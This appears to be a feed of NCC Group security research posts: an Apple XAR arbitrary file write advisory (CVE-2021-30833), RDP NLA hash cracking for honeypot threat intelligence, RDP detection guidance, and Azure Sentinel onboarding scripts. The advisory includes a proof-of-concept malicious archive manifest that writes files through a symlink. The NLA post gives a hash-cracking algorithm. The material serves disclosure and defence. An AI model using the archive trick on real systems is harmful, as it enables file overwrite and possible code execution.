The talk covers the above key areas and provides a detailed walk through, moving from introducing the subject, all the way up to the knowledge which is needed for both offense and defence on modern Windows versions.

Keynote: The Hacker’s Guide to Mentorship: Fostering the Diverse Workforce of the Future
Tennisha Martin

SANS Pentest HackFest
November 15-16 2021

Mentoring is often used to foster talent within an organization, pairing a junior employee with a more senior high performer.  The mentee learns to mirror the behaviors of the mentor, which can be key to advancement.  However, it can also lead to a subconscious bias, where employees end up hiring people just like them. This results in organizations that are homogeneous in their thoughts, viewpoints, backgrounds, ideas, perspectives, and approaches to problem solving. In a pen testing context, this leads to similar approaches to vulnerability discovery, testing, and results analysis. Pen testing is all about repeatable processes, and when you don’t change, you don’t learn anything or find anything new. Pen testers need a new approach to mentorship, one that recognizes the impact of a diversified workforce on business outcomes such as increasing innovation, diversifying skill sets, increasing motivation and engagement, and, critically, retain high-potential talent. The Hacker’s Guide to Mentorship provides an outline of how to improve your bottom line by fixing your talent problem.


Financial Post-Quantum Cryptography in Production: A CISO’s Guide
Jennifer Fernick

FS-ISAC
November 30 2021

Security leaders have to constantly filter signal from noise about emerging threats, including security risks associated with novel emerging technologies like quantum computing. In this presentation, we will explore post-quantum cryptography specifically through the lens of upgrading financial institutions’ cryptographic infrastructure.

We’re going to take a different approach to most post-quantum presentations, by not discussing quantum mechanics or why quantum computing is a threat, and instead starting from the known fact that most of the public-key cryptography on the internet will be trivially broken by existing quantum algorithms, and cover strategic applied security topics to address this need for a cryptographic upgrade, such as:  

  • Financial services use cases for cryptography and quantum-resistance, and context-specific nuances in computing environments such as mainframes, HSMs, public cloud, CI/CD pipelines, third-party and multi-party financial protocols, customer-facing systems, and more 
  • Whether quantum technologies like QKD are necessary to achieve quantum-resistant security
  • Post-quantum cryptographic algorithms for digital signatures, key distribution, and encryption 
  • How much confidence cryptanalysts currently have in the quantum-resistance of those ciphers, and what this may mean for cryptography standards over time 
  • Deciding when to begin integrating PQC in a world of competing technology standards 
  • Designing extensible cryptographic architectures
  • Actions financial institutions’ cryptography teams can take immediately 
  • How to talk about this risk with your corporate board

This presentation is rooted in both research and practice, is entirely vendor- and product-agnostic, and will be easily accessible to non-cryptographers, helping security leaders think through the practical challenges and tradeoffs when deploying quantum-resistant technologies. 

✇ NCC Group Research

Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833)

By: Rich Warren
Vendor: Apple
Vendor URL: https://www.apple.com/
Versions affected: xar 1.8-dev
Systems Affected: macOS versions below 12.0.1
Author: Richard Warren <richard.warren[at]nccgroup[dot]trust>
Advisory URL: https://support.apple.com/en-gb/HT212869
CVE Identifier: CVE-2021-30833
Risk: 5.0 Medium CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Summary

XAR is a file archive format used in macOS, and is part of various file formats, including .xar, .pkg, .safariextz, and .xip files. XAR archives are extracted using the xar command-line utility. XAR was initially developed under open source, however, the original project appears to be no longer maintained. Apple maintains their own branch of XAR for macOS, which is published on the Apple Open Source website. The xar utility suffers from a logical vulnerability which allows files to be extracted outside of the intended destination folder, resulting in arbitrary file write anywhere on the filesystem (permissions allowing).

Impact

An attacker could construct a maliciously crafted .xar file, which when extracted by a user, would result in files being written to a location of the attacker’s choosing. This could be abused to gain Remote Code Execution.

Details

The XAR archive format supports archiving and extraction of symlinks for both files and directories. When extracting an archive which contains both a directory symlink and a file within a directory named the same as the directory symlink, xar will overwrite the directory symlink with a real directory. This protects against maliciously crafted archives where a symlink directory is unarchived and a file is unarchived into it. An example of the Table of Contents (ToC) for a .xar file in this scenario is shown below:

<?xml version="1.0" encoding="UTF-8"?>
<xar>
 <toc>
  <checksum style="sha1">
   <offset>0</offset>
   <size>20</size>
  </checksum>
  <file id="1">
   <link type="directory">/tmp/</link>
   <type>symlink</type>
   <name>xx</name>
  </file>
  <file id="2">
   <type>directory</type>
   <name>x</name>
   <file id="3">
    <data>
     <length>6</length>
     <encoding style="application/octet-stream"/>
     <offset>20</offset>
     <size>6</size>
     <extracted-checksum style="sha1">aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</extracted-checksum>
     <archived-checksum style="sha1">aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</archived-checksum>
    </data>
    <type>file</type>
    <name>foo</name>
   </file>
  </file>
 </toc>

As shown below, this results in the directory “x” being created in the current directory, and the file foo being written within it, rather than to the /tmp/ directory – which was the target of the directory symlink:

However, xar allows for a forward-slash separated path to be specified in the file name property, e.g. <name>x/foo</name> – as long as it doesn’t traverse upwards, and the path exists within the current directory. This means an attacker can create a .xar file which contains both a directory symlink, and a file with a name property which points into the extracted symlink directory. By abusing symlink directories in this manner, an attacker can write arbitrary files to any directory on the filesystem – providing the user has permissions to write to it. An example of the ToC for a malicious .xar file which exploits this vulnerability is shown below:

<?xml version="1.0" encoding="UTF-8"?>
<xar>
 <toc>
  <checksum style="sha1">
   <offset>0</offset>
   <size>20</size>
  </checksum>
  <file id="1">
   <link type="directory">/tmp/</link>
   <type>symlink</type>
   <name>.x</name>
  </file>
  <file id="2">
    <data>
     <length>6</length>
     <encoding style="application/octet-stream"/>
     <offset>20</offset>
     <size>6</size>
     <extracted-checksum style="sha1"> aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</extracted-checksum>
     <archived-checksum style="sha1"> aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</archived-checksum>
    </data>
    <type>file</type>
    <name>.x/test</name>
   </file>
 </toc>
</xar>

The following screenshot shows successful exploitation of this vulnerability to write a file into the /tmp/ directory using a directory symlink:

Recommendation

Update to macOS 12.0.1 or above.

Vendor Communication

2021-06-04 – Reported to Apple Product Security.
2021-06-08 - Apple advise they are investigating the report and require more than 30 days.
2021-06-24 - Apple confirm they are able to reproduce the vulnerability and are working to address in a future major macOS update.
2021-08-17 - We request an estimated date for a fix from Apple.
2021-08-19 - Apple advise they are still working on addressing the issue. Request that we hold off any disclosure.
2021-10-25 - macOS 12.0.1 released, which addresses the reported vulnerability.
2021-10-28 - Advisory published.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published Date: 2021-10-28

Written By: Richard Warren

✇ NCC Group Research

Public Report – WhatsApp End-to-End Encrypted Backups Security Assessment

By: Jennifer Fernick

During the summer of 2021, WhatsApp engaged NCC Group’s Cryptography Services team to conduct an independent security assessment of its End-to-End Encrypted Backups project. End-to-End Encrypted Backups is an hardware security module (HSM) based key vault solution that aims to primarily support encrypted backup of WhatsApp user data. This assessment was performed remotely, as a 35 person-day effort by three NCC Group consultants over the course of five weeks. NCC Group and the WhatsApp team scheduled the retesting of findings, and preparation of this public report a few weeks later, following the delivery of the initial security assessment.

The Public Report for this review may be downloaded below:

✇ NCC Group Research

Cracking RDP NLA Supplied Credentials for Threat Intelligence

By: Ray Lai

NLA Honeypot Part Deux

This is a continuation of the research from Building an RDP Credential Catcher for Threat Intelligence. In the previous post, we described how to build an RDP credential catcher for threat intelligence, with the caveat that we had to disable NLA in order to receive the password in cleartext. However, RDP clients may be attempting to connect with NLA enabled, which is a stronger form of authentication that does not send passwords in cleartext. In this post, we discuss our work in cracking the hashed passwords being sent over NLA connections to ascertain those supplied by threat actors.

This next phase of research was undertaken by Ray Lai and Ollie Whitehouse.

What is NLA?

NLA, or Network Level Authentication, is an authentication method where a user is authenticated via a hash of their credentials over RDP. Rather than passing the credentials in cleartext, a number of computations are performed on a user’s credentials prior to being sent to the server. The server then performs the same computations on its (possibly hashed) copy of the user’s credentials; if they match, the user is authenticated.

By capturing NLA sessions, which includes the hash of a user’s credentials, we can then perform these same computations using a dictionary of passwords, crack the hash, and observe which credentials are being sprayed at RDP servers.

The plan

  1. Capture a legitimate NLA connection.
  2. Parse and extract the key fields from the packets.
  3. Replicate the computations that a server performs on the extracted fields during authentication.

In order to replicate the server’s authentication functionality, we needed an existing server that we could look into. To do this, we modified FreeRDP, an open-source RDP client and server software that supported NLA connections.

Our first modification was to add extra debug statements throughout the code in order to trace which functions were called during authentication. Looking at this list of called functions, we determined six functions that either parsed incoming messages or generated outgoing messages.

There are six messages that are sent (“In” or “Out” is from the perspective of the server, so “Negotiate In” is a message sent from the client to the server):

  1. Negotiate In
  2. Negotiate Out
  3. Challenge In
  4. Challenge Out
  5. Authenticate In
  6. Authenticate Out

Once identified, we patched these functions to write the packets to a file. We named the files XXXXX.NegotiateIn, XXXXX.ChallengeOut, etc., with XXXXX being a random integer that was specific to that session, so that we could keep track of which packets were for which session.

Parsing the packets

With the messages stored in files, we began work to parse these messages. For a proof of concept, we wrote a parser for these six messages in Python in order to have a high-level understanding of what was needed in order to crack the hashes contained within the messages. We parsed out each field into its own object, taking hints from FreeRDP code.

Dumping intermediary calculations

When it came time to figure out what type of calculation was being performed by each function (or each step of the function), we also added code to individual functions to dump raw bytes that were given as inputs and outputs in order to ensure that the calculations were correctly done in the Python code.

Finally, authentication

The ultimate step in NLA authentication is when the server receives the “Authentication In” message from the client. At that point, it takes all the previous messages, performs some calculation on it, and compares it with the “MIC” stored in the “Authentication In” message.

MIC stands for Message Integrity Check, and is roughly the following:

# User, Domain, Password are UTF-16 little-endian
NtHash = MD4(Password)
NtlmV2Hash = HMAC_MD5(NtHash, User + Domain)
ntlm_v2_temp_chal = ChallengeOut->ServerChallenge
                  + "\x01\x01\x00\x00\x00\x00\x00\x00"
                  + ChallengeIn->Timestamp
                  + AuthenticateIn->ClientChallenge
                  + "\x00\x00\x00\x00"
                  + ChallengeIn->TargetInfo
NtProofString = HMAC_MD5(NtlmV2Hash, ntlm_v2_temp_chal)
KeyExchangeKey = HMAC_MD5(NtlmV2Hash, NtProofString)
if EncryptedRandomSessionKey:
    ExportedSessionKey = RC4(KeyExchangeKey, EncryptedRandomSessionKey)
else:
    ExportedSessionKey = KeyExchangeKey
msg = NegotiateIn + ChallengeIn + AuthenticateOut
MIC = HMAC_MD5(ExportedSessionKey, msg)

In the above algorithm, all values are supplied within the six NLA messages (User, Domain, Timestamp, ClientChallenge, ServerChallenge, TargetInfo, EncryptedRandomSessionKey, NegotiateIn, ChallengeIn, and AuthenticateOut), except for one: Password.

But now that we have the algorithm to calculate the MIC, we can perform this same calculation on a list of passwords. Once the MIC matches, we have cracked the password used for the NLA connection!

At this point we are ready to start setting up RDP credential catchers, dumping the NLA messages, and cracking them with a list of passwords.

Code

All the code we developed as part of this project we have open sourced here – https://github.com/nccgroup/nlahoney this includes:

Along with all our supporting research notes and code.

Future

The next logical step would be to rewrite the Python password cracker into a hashcat module, left as an exercise to the reader.

✇ NCC Group Research

Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the Internet

By: Michael Gough

Category:  Detection/Reduction/Prevention

Overview

Remote Desktop Protocol (RDP) is how users of Microsoft Windows systems can get a remote desktop on systems remotely to manage one or more workstations and/or servers.  With the increase of organizations opting for remote work, so to has RDP usage over the internet increased. However, RDP was not initially designed with the security and privacy features needed to use it securely over the internet. RDP communicates over the widely known port 3389 making it very easy to discover by criminal threat actors.  Furthermore, the default authentication method is limited to only a username and password.

The dangers of RDP exposure, and similar solutions such as TeamViewer (port 5958) and VNC (port 5900) are demonstrated in a recent report published by cybersecurity researchers at Coveware. The researchers found that 42 percent of ransomware cases in Q2 2021 leveraged RDP Compromise as an attack vector. They also found that “In Q2 email phishing and brute forcing exposed remote desktop protocol (RDP) remained the cheapest and thus most profitable and popular methods for threat actors to gain initial foot holds inside of corporate networks.” 

RDP has also had its fair share of critical vulnerabilities targeted by threat actors. For example, the BlueKeep vulnerability (CVE- 2019-0708) first reported in May 2019 was present in all unpatched versions of Microsoft Windows 2000 through Windows Server 2008 R2 and Windows 7.  Subsequently, September 2019 saw the release of a public wormable exploit for the RDP vulnerability.

The following details are provided to assist organizations in detecting, threat hunting, and reducing malicious RDP attempts.

The Challenge for Organizations

The limitations of authentication mechanisms for RDP significantly increases the risk to organizations with instances of exposed RDP to the internet. By default, RDP does not have a built-in multi-factor authentication (MFA). To add MFA to RDP logins, organizations will have to implement a Remote Desktop Gateway or place the RDP server behind a VPN that supports MFA. However, these additional controls add cost and complexity that some organizations may not be able to support.

The risk of exposed RDP is further highlighted through user propensity for password reuse. Employees using the same password for RDP as they do for other websites means if a website gets breached, threat actors will likely add that password to a list for use with brute force attempts.

Organizations with poor password policies are bound to the same pitfalls as password reuse for RDP.  Shorter and easily remembered passwords give threat actors an increased chance of success in the brute force of exposed RDP instances.

Another challenge is that organizations do not often monitor RDP logins, allowing successful RDP compromises to go undetected. In the event that RDP logins are collected, organizations should work to make sure that, at the very least, timestamps, IP addresses, and the country or city of the login are ingested into a log management solution.

Detection

Detecting the use of RDP is something that is captured in several logs within a Microsoft Windows environment. Unfortunately, most organizations do not have a log management or SIEM solution to collect the logs that could alert to misuse, furthering the challenge to organizations to secure RDP. 

RDP Access in the logs

RDP logons or attacks will generate several log events in several event logs.  These events will be found on the target systems that had RDP sessions attempted or completed, or Active directory that handled the authentication.  These events would need to be collected into a log management or SIEM solution in order to create alerts for RDP behavior.  There are also events on the source system that can be collected, but we will save that for another blog.

Being that multiple log sources contain RDP details, why collect more than one? The devil is in the details, and in the case of RDP artifacts, various events from different log sources can provide greater clarity of RDP activities. For investigations, the more logs, the better if malicious behavior is suspected.

Of course, organizations have to consider log management volume when ingesting new log sources, and many organizations do not collect workstation endpoint logs where RDP logs are generated. However, some of the logs specific to RDP will generally have a low quantity of events and are likely not to impact a log management volume or license. This is especially true because RDP logs are only found on the target system, and typically RDP is seldom used for workstations.

Generally, if you can collect a low noise/volume high validity event from all endpoints into a log management solution, the better your malicious detection can be. An organization will need to test and decide which events to ingest based collectively on their environment, log management solution, and the impact on licensing and volume.

The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

  • Logon/Logoff – Audit Logon = Success and Failed

The following query logic can be used and contain a lot of details about all authentication to a system, so a high volume event:

  • Event Log = Security
  • Event ID = 4624 (success)
  • Event ID = 4625 (failed)
  • Logon Type = 10 (RDP)
  • Account Name = The user name logging off
  • Workstation Name = This will be from the log of system being logged off from

Optionally, another logon can be enabled to collect RDP events, but this will also generate a lot of other logon noise.  The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

  • Logon/Logoff – Other Logon/Logoff Events = Success and Failed

The following query logic can be used and contain a few details about session authentication to a system, so a low volume event:

  • Event Log = Security
  • Event ID = 4778 (connect)
  • Event ID = 4779 (disconnect)
  • Account Name = The user name logging off
  • Session Name = RDP-Tcp#3
  • Client Name = This will be the system name of the source system making the RDP connection
  • Client Address = This will be the IP address of the source system making the RDP connection

There are also several RDP logs that will record valuable events that can be investigated during an incident to determine the source of the RDP login.  Fortunately, the Windows Advanced Audit Policy will not need to be updated to collect these events and are on by default:

The following query logic can be used and contain a few details about RDP connections to a system, so a low volume event:

  • Event Log = Microsoft-Windows-TerminalServices-LocalSessionManager
  • Event ID = 21 (RDP connect)
  • Event ID = 24 (RDP disconnect)
  • User = The user that made the RDP connection
  • Source Network Address = The system where the RDP connection originated
  • Message = The connection type

The nice thing about having these logs is that even if a threat actor clears the log before disconnecting, the Event ID 24 (disconnect) will be created after the logs have been cleared and then the user disconnects.  This allows tracing of the path of the user and/or treat actor took from system to system.

The following query logic can be used and contain a few details about RDP connections to a system, so a low volume event:

Event Log = Microsoft-Windows-TerminalServices-RemoteConnectionManager

  • Event ID = 1149 (RDP connect)
  • User = The user that made the RDP connection
  • Source Network Address = The system where the RDP connection originated

Event Log = Microsoft-Windows-TerminalServices-RDPClient

  • Event ID = 1024 (RDP connection attempt)
  • Event ID = 1102 (RDP connect)
  • Message = The system where the RDP connection originated

Threat Hunting

The event IDs previously mentioned would be a good place to start when hunting for RDP access. Since RDP logs are found on the target host, an organization will need to have a solution or way to check each workstation and server for these events in the appropriate log or use a log management SIEM solution to perform searches. Threat actors may clear one or more logs before disconnecting, but fortunately, the disconnect event will be in the logs allowing the investigator to see the source of the RDP disconnect. This disconnect (event ID 24) can be used to focus hunts on finding the initial access point of the RDP connection if the logs are cleared.

Reduction/Prevention

The best and easiest option to reduce the likelihood of malicious RDP attempts is to remove RDP from being accessible from the internet.  NCC Group has investigated many incidents where our customers have had RDP open to the internet only to find that it was actively under attack without the client knowing it or the source of the compromise.  Knowing that RDP is highly vulnerable, as the Coveware report states, removing RDP from the internet, securing it, or finding another alternative is the highest recommendation NCC Group can make for organizations that need RDP for remote desktop functions.

Remote Desktop Gateway

Remote Desktop Gateway (RD Gateway) is a role that is added to a Windows Server that you publish to the internet that provides SSL (encrypted RDP over ports TCP 443 and UDP 3391) access instead of the RDP protocol over port 3389.  The RD Gateway option is more secure than just RDP alone, but still should be protected with MFA.

Virtual Private Network (VPN)

Another standard option to reduce malicious RDP attempts is to use RDP behind a VPN.  If VPN infrastructure is already in place, organizations have, or can easily adjust their firewalls to meet this.  Organizations should also monitor VPN logins for access attempts, and the source IP resolved to the country of origin.  Known good IP addresses for users can be implemented to reduce the noise of voluminous VPN access alerts and highlight anomalies.

Jump Host

Many organizations utilize jump hosts protected by MFA to authenticate before to internal systems via RDP.  However, keep in mind that jump hosts face the internet and are thus susceptible to flaws in the jump host application. Therefore, organizations should monitor the jump host application and apply patches as fast as possible.

Cloud RDP

Another option is to use a cloud environment like Microsoft Azure to host a remote solution that provides MFA to deliver trusted connections back to the organization.

Change the RDP Listening Port

Although not recommended to simply prevent RDP attacks, swapping the default port from 3389 to another port can be helpful from a detection standpoint. By editing the Windows registry, the default listening port can be modified, and organizations can implement a SIEM detection to capture port 3389 attempts. However, keep in mind that even though the port changes, recon scans can easily detect RDP listening on a given port in which an attacker can then change their port target.

IP Address restrictions

Lastly, organizations can use a dedicated firewall appliance or Windows Firewall on the host machines managed by Group Policy to restrict RDP connections to known good IP addresses. However, this option comes with a high administrative burden as more users are provisioned or travel for work. Nevertheless, this option is often the best short-term solution to secure RDP until one of the more robust solutions can be engineered and put in place.

Conclusion

Organizations should take careful consideration when utilizing RDP over the internet. We hope this blog entry helps provide options to reduce the risk of infection and compromise from ever-increasing attacks on RDP, as well as some things to consider when implementing and using RDP. 

References and Additional Reading

✇ NCC Group Research

Enterprise-scale seamless onboarding and deployment of Azure Sentinel using Lighthouse for multi-tenant environments

By: Philipp Schaefer

NCC Group is offering a new fully Managed Detection and Response (MDR) service for our customers in Azure. This blog post gives a behind the scenes view of some of the automated processes involved in setting up new environments and managing custom analytics for each customer, including details about our scripting and automated build and release pipelines, which are deployed as infrastructure-as-code.

If you are:

  • a current or potential customer interested in how we manage our releases
  • just starting your journey into onboarding Sentinel for large multi-Tenant environments
  • are looking to enhance existing deployment mechanisms
  • are interested in a way to manage multi-Tenant deployments with varying set-up

…you have come to the right place!

Background

Sentinel is Microsoft’s new Security Information and Event Management solution hosted entirely on Azure.

NCC Group has been providing MDR services for a number of years using Splunk and we are now adding Sentinel to the list.

The benefit of Sentinel over the Splunk offering is that you will be able to leverage existing Azure licenses and all data will be collected and visibile in your own Azure tenants.

The only bits we keep on our side are the custom analytics and data enrichment functions we write for analysing the data.

What you might learn

The solution covered in this article provides a possible way to create an enterprise scale solution that, once implemented, gives the following benefits:

  • Management of a large numbers of tenants with differing configurations and analytics
  • Minimal manual steps for onboarding new tenants
  • Development and source control of new custom analytics
  • Management of multiple tenants within one Sentinel instance
  • Zero downtime / parallel deployments of new analytics
  • Custom web portal to manage onboarding, analytics creation, baselining, and configuration of each individual tenants’ connectors and enabled analytics

The main components

Azure Sentinel

Sentinel is Microsoft’s cloud native SIEM (Security Incident and Event Management) solution. It allows for gathering of a large number of log and event sources to be interrogated in real time, using in-built and custom KQL to automatically identify and respond to threats.

Lighthouse

Azure Lighthouse enables multi-tenant management with scalability, higher automation, and enhanced governance across resources.”

In essence, it allows a master tenant direct access to one or many sub or customer tenants without the need to switch directory or create custom solutions.

Lighthouse is used in this solution to connect to log analytics workspaces in additional tenants and view them within the same instance of Sentinel in our “master tenant”.

Log Analytics Workspaces

Analytics workspaces are where the data sources connected to Sentinel go into in this scenario. We will connect workspaces from multiple tenants via Lighthouse to allow for cross tenant analysis.

Azure DevOps (ADO)

Azure DevOps provides the core functionality for this solution used for both its CI/CD pipelines (Using YAML, not Classic for this) and inbuilt Git repos. The solutions provided will of course work if you decide to go for a different system.

App Service

To allow for easy management of configurations, onboarding and analytics development / baselining we hosted a small Web application written in Blazor, to avoid having to manually change JSON config files. The app also draws in MITRE and other additional data to enrich analytics.

Technologies breakdown:

In order for us to create and manage the required services we need to make use Infrastructure as Code (IaC), scripting, automated build and release pipelines as well as have a way to develop a management portal.

The technologies we ended up using for this were:

  • ARM Templates for general resource deployments and some of the connectors
  • PowerShell using Microsoft AZ / Sentinel and Roberto Rodriquez’s Azure-Sentinel2Go   
  • API calls for baselining and connectors not available through PowerShell modules
  • Blazor for configuration portal development
  • C# for API backend Azure function development
  • YAML Azure DevOps Pipelines

Phase 1: Tenant Onboarding

Let’s step through this diagram.

We are going to have a portal that allows us to configure a new client, go through an approval step to ensure configs are peer reviewed before going into production, by pushing the configuration into a new branch in source control, then trigger a Deployment pipeline.

The pipeline triggers 2 Tenant deployments.

Tenant A is our “Master tenant” that will hold the main Sentinel, all custom analytics, alerts, and playbooks and connect, using lighthouse, to all “Sub tenants” (Tenant B).

In the large organisations we would create a 1:1 mapping for each sub tenant by deploying additional workspaces that then point to the individual tenants. This has the benefit of keeping the analytics centralised, protecting intellectual property. You could, however, deploy them directly into the actual workspaces once Lighthouse is set up or have one workspace that queries all the others.

Tenant B and all other additional Tenants have their own instance of Sentinel with all required connectors enabled and need to have the lighthouse connection initiated from that side.

Pre-requisites:

To be able to deploy to either of the tenants we need Service connections for Azure DevOps to be in place.

“Sub tenant” deployment:

Some of the Sentinel Connectors need pretty extreme permissions to be enabled, for example to configure the Active Directory connector properly we need Global Administrator, Security Administrator roles as well as root scope Owner permissions on the tenant.  

In most cases, once the initial set up of the “sub tenant” is done there will rarely be a need to add additional connectors or deploy to that tenant, as all analytics are created on the “Master tenant”. I would strongly suggest either to disable or completely remove the Tenant B service connection after setup. If you are planning to regularly change connectors and are happy with the risk of leaving this service principal in place, then the steps will allow you to do this.

A sample script for setting this up the “Sub tenant” service Principal

$rgName = 'resourceGroupName' ## set the value of this to the resource group name containing the sentinel log analytics workspace
Connect-AzAccount
$cont = Get-AzContext
Connect-AzureAD -TenantId $cont.Tenant
 
$sp = New-AzADServicePrincipal -DisplayName ADOServicePrincipalName

Sleep 20
$assignment =  New-AzRoleAssignment -RoleDefinitionName Owner -Scope '/' -ServicePrincipalName $sp.ApplicationId -ErrorAction SilentlyContinue
New-AzRoleAssignment -RoleDefinitionName Owner -Scope "/subscriptions/$($cont.Subscription.Id)/resourceGroups/$($rgName)" -ServicePrincipalName $sp.ApplicationId
New-AzRoleAssignment -RoleDefinitionName Owner -Scope "/subscriptions/$($cont.Subscription.Id)" -ServicePrincipalName $sp.ApplicationId

$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($sp.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$roles = Get-AzureADDirectoryRole | Where-Object {$_.displayName -in ("Global Administrator","Security Administrator")}
foreach($role in $roles)
{
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.Id
}
$activeDirectorySettingsPermissions = (-not $assignment -eq $null)
$sp | select @{Name = 'Secret'; Expression = {$UnsecureSecret}},@{Name = 'tenant'; Expression = {$cont.Tenant}},@{Name = 'Active Directory Settings Permissions'; Expression = {$activeDirectorySettingsPermissions}},@{Name = 'sub'; Expression = {$cont.Subscription}}, applicationId, Id, DisplayName

This script will:

  1. create a new Service Principal,
  2. set the Global Administrator and Security Administrator roles for the principal,
  3. attempt to give root scope Owner permissions as well as subscription scope owner as a backup as this is the minimum required to connect Lighthouse if the root scope permissions are not set.

The end of the script prints out the details required to set this up as a Service connection in Azure DevOps . You could of course continue on to add the Service connection directly to Azure DevOps if the person running the script has access to both, but it was not feasible for my requirements.

For Tenant A we have 2 options.

Option 1: One Active Directory group to rule them all

This is something you might do if you are setting things up for your own multi-tenant environments. If you are have multiple environments to manage and different analysts’ access for each, I would strongly suggest using option 2.

Create an empty Azure Active Directory group either manually or using

(New-AzADGroup -DisplayName 'GroupName' -MailNickname 'none').Id
(Get-AzTenant).Id

You will need the ID of both the Group and the tenant in a second so don’t lose it just yet.

Once the group is created, set up a Service Connection to your Master tenant from Azure DevOps (just use the normal connection Wizard), then add the Service Principal to the newly created group as well as users you want to have access to the Sentinel (log analytics) workspaces.

To match the additional steps in Option 2, create a Variable group (either directly but masked or connected to a KeyVault depending on your preference) in Azure DevOps (Pipelines->Library->+Variable Group)

Make sure you restrict both Security and Pipeline permissions for the variable group to only be usable for the appropriate pipelines and users whenever creating variable groups.

Then Add:

AAdGroupID with your new Group ID

And

TenantID with the Tenant ID of the master tenant.

Then reference the Group at the top of your YAML pipeline within the Job section with

variables:
      - group: YourGroupName

Option 2: One group per “Sub tenant”

If you are managing customers, this is a much better way to handle things. You will be able to assign different users, to the groups to ensure only the correct people have access to the environments they are meant to have.

However, to be able to do this you need a Service Connection with some additional rights in your “Master Tenant”, so your pipelines can automatically create customer specific AD groups and add the Service principal to them.

Set up a Service Connection from Azure DevOps to your Master Tenant, then find the Service Principal and give it the following permissions

  • Azure Active Directory Graph
    • Directory.ReadWrite.All
  • Microsoft Graph
    • Directory.ReadWrite.All
    • PrivilegedAccess.ReadWrite.AzureADGroup

Then include the following script in your Pipeline to Create the group to be used for each customer and adding the service principal name to it.

param(
    [string]$AADgroupName,
    [string]$ADOServicePrincipalName
)
$group1 = Get-AzADGroup -DisplayName $AADgroupName -ErrorAction SilentlyContinue
if(-not $group1)
{
$guid1 = New-Guid
$group1 = New-AzADGroup -DisplayName $AADgroupName  -MailNickname $guid1 -Description $AADgroupName
$spID = (Get-AzADServicePrincipal -DisplayName $ADOServicePrincipalName).Id
Add-AzADGroupMember -MemberObjectId $spID -TargetGroupObjectId $group1.Id
}
$id = $group1.id
$tenant = (Get-AzTenant).Id
Write-Host "##vso[task.setvariable variable=AAdGroupId;isOutput=true]$($id)"
Write-Host "##vso[task.setvariable variable=TenantId;isOutput=true]$($tenant)" 

The Write-Hosts at the end of the script outputs the group and Tenant ID back to the pipeline to be used in setting up Lighthouse later.

With the boring bits out of the way, let’s get into the core of things.

Client configurations

First, we need to create configuration files to be able to manage the connectors and analytics that get deployed for each “Sub tenant”.

You can of course do this manually, but I opted to go for a slightly more user-friendly approach with the Blazor App.

The main bits we need, highlighted in yellow above are:

  • A name for the config
  • The Azure DevOps Service Connection name for the target Sub tenant,
  • Azure Region (if you are planning to deploy to multiple regions),
  • Target Resource Group and Target Workspace, this is either where the current Log Analytics of your target environment already exist or should be created.

Client config Schema:

    public class ClientConfig
    {
        public string ClientName { set; get; } = "";
        public string ServiceConnection { set; get; } = "";
        public List<Alert> SentinelAlerts { set; get; } = new List<Alert>();
        public List<Search> SavedSearches { set; get; } = new List<Search>();
        public string TargetWorkspaceName { set; get; } = "";
        public string TargetResourceGroup { set; get; } = "";
        public string Location { get; set; } = "UK South";
        public string connectors { get; set; } = "";
    }

Sample Config output:

{
    "ClientName": "TenantB",
    "ServiceConnection": "ServiceConnectionName",
    "SentinelAlerts": [
        {
            "Name": "ncc_t1558.003_kerberoasting"
        },
        {
            "Name": "ncc_t1558.003_kerberoasting_downgrade_v1a"
        }
    ],
    "SavedSearches": [],
    "TargetWorkspaceName": "targetworkspace",
    "TargetResourceGroup": "targetresourcegroup",
    "Location": "UK South",
    "connectors": "Office365,ThreatIntelligence,OfficeATP,AzureAdvancedThreatProtection,AzureActiveDirectory,MicrosoftDefenderAdvancedThreatProtection,AzureSecurityCenter,MicrosoftCloudAppSecurity,AzureActivity,SecurityEvents,WindowsFirewall,DNS,Syslog"
}

This data can then be pushed onto a storage account and imported into Git from a pipeline triggered through the app.

pool:
vmImage: 'windows-latest'

steps:
-checkout: self
 persistCredentials: true
  clean: true
- task: [email protected]
  displayName: 'Export Configs'
  inputs:
azureSubscription: 'Tenant A Service Connection name'
    ScriptType: 'FilePath'
    ScriptPath: '$(Build.SourcesDirectory)/Scripts/Exports/ConfigExport.ps1'
    ScriptArguments: '-resourceGroupName "StorageAccountResourceGroupName" -storageName "storageaccountname" -outPath "Sentinel\ClientConfigs\" -container "configs"'
    azurePowerShellVersion: 'LatestVersion'

- task: [email protected]
  displayName: 'Commit Changes to new Git Branch'
  inputs:
filePath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/PushToGit.ps1'
    arguments: '-branchName conf$(Build.BuildNumber)'

Where ConfigExports.ps1 is

param(
    [string]$ResourceGroupName ,
    [string]$storageName ,
    [string]$outPath =,
    [string]$container
)

$ctx = (Get-AzStorageAccount -ResourceGroupName $ResourceGroupName -Name $storageName).Context
$blobs  = Get-AzStorageBlob -Container $container -Context $ctx

if(-not (Test-Path -Path $outPath))
{
New-Item -ItemType directory $outPath -Force
}
Get-ChildItem -Path $outPath -Recurse | Remove-Item -force -recurse
foreach($file in $blobs)
{
Get-AzStorageBlobContent -Context $ctx -Container $container -Blob $file.Name  -Destination ("$($outPath)/$($file.Name)") -Force
}

And PushToGit.ps1

param(
[string] $branchName
)
git --version
git switch -c $branchName
git add -A
git config user.email [email protected]
git config user.name "Automated Build"
git commit -a -m "Commiting rules to git"
git push --set-upstream -f origin $branchName

This will download the config files, create a new Branch in the Azure DevOps Git Repo and upload the files.

